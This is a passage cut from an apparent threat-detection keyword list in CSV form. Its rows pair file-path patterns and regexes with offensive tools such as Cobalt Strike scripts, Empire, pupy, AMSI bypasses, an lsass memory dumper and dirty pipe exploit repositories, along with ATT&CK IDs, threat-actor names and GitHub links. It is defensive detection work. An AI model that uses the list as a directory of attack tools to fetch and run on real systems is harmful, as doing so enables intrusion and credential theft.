T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ahmedkhlief/Ninja/*",".{0,1000}\/ahmedkhlief\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ahrixia/CVE_2022_0847*",".{0,1000}\/ahrixia\/CVE_2022_0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*/ajp-auth.nse*",".{0,1000}\/ajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-brute.nse*",".{0,1000}\/ajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-headers.nse*",".{0,1000}\/ajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-methods.nse*",".{0,1000}\/ajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-request.nse*",".{0,1000}\/ajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/alan.log*",".{0,1000}\/alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*/Alan.v*.zip*",".{0,1000}\/Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*/Alaris.sln*",".{0,1000}\/Alaris\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*/Alcatraz.exe*",".{0,1000}\/Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz.git*",".{0,1000}\/Alcatraz\.git.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz/files/*/Alcatraz.zip*",".{0,1000}\/Alcatraz\/files\/.{0,1000}\/Alcatraz\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz/x64*",".{0,1000}\/Alcatraz\/x64.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz-gui*",".{0,1000}\/Alcatraz\-gui.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/all/pupyutils/*.py*",".{0,1000}\/all\/pupyutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/All_attack.txt*",".{0,1000}\/All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/allseeingeye-info.nse*",".{0,1000}\/allseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amass/wordlists*",".{0,1000}\/amass\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Amnesiac.git*",".{0,1000}\/Amnesiac\.git.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/amqp-info.nse*",".{0,1000}\/amqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amsi.py*",".{0,1000}\/amsi\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Amsi_Bypass_In_2023*",".{0,1000}\/Amsi_Bypass_In_2023.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","4","350","63","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*/AMSI_patch.git*",".{0,1000}\/AMSI_patch\.git.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*/AmsiBypass.*",".{0,1000}\/AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*/Amsi-Bypass-Powershell.git*",".{0,1000}\/Amsi\-Bypass\-Powershell\.git.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*/Amsi-Killer.git*",".{0,1000}\/Amsi\-Killer\.git.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*/AmsiOpenSession.exe*",".{0,1000}\/AmsiOpenSession\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*/AMSI-Provider.git*",".{0,1000}\/AMSI\-Provider\.git.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*/AMSITrigger.git*",".{0,1000}\/AMSITrigger\.git.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*/Analyzer-Session.log*",".{0,1000}\/Analyzer\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/AndrewSpecial.git*",".{0,1000}\/AndrewSpecial\.git.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*/android/pupydroid/*",".{0,1000}\/android\/pupydroid\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/ANGRYPUPPY.cna*",".{0,1000}\/ANGRYPUPPY\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*/antak.aspx*",".{0,1000}\/antak\.aspx.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/anthemtotheego/CredBandit*",".{0,1000}\/anthemtotheego\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*/anti_analysis.exe*",".{0,1000}\/anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/anti_debug.exe*",".{0,1000}\/anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/AntiTamper.exe*",".{0,1000}\/AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/antx-code/CVE-2022-0847*",".{0,1000}\/antx\-code\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/antx-code/CVE-2022-0847","1","1","N/A","N/A","1","62","21","2022-03-08T09:14:25Z","2022-03-08T09:10:51Z" "*/AoratosWin/*",".{0,1000}\/AoratosWin\/.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*/apc_injection.exe*",".{0,1000}\/apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/APCLdr.*",".{0,1000}\/APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","4","300","52","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*/api/admin/shutdown?token=*",".{0,1000}\/api\/admin\/shutdown\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/*/kill?token=*",".{0,1000}\/api\/agents\/.{0,1000}\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/all/kill?token=*",".{0,1000}\/api\/agents\/all\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 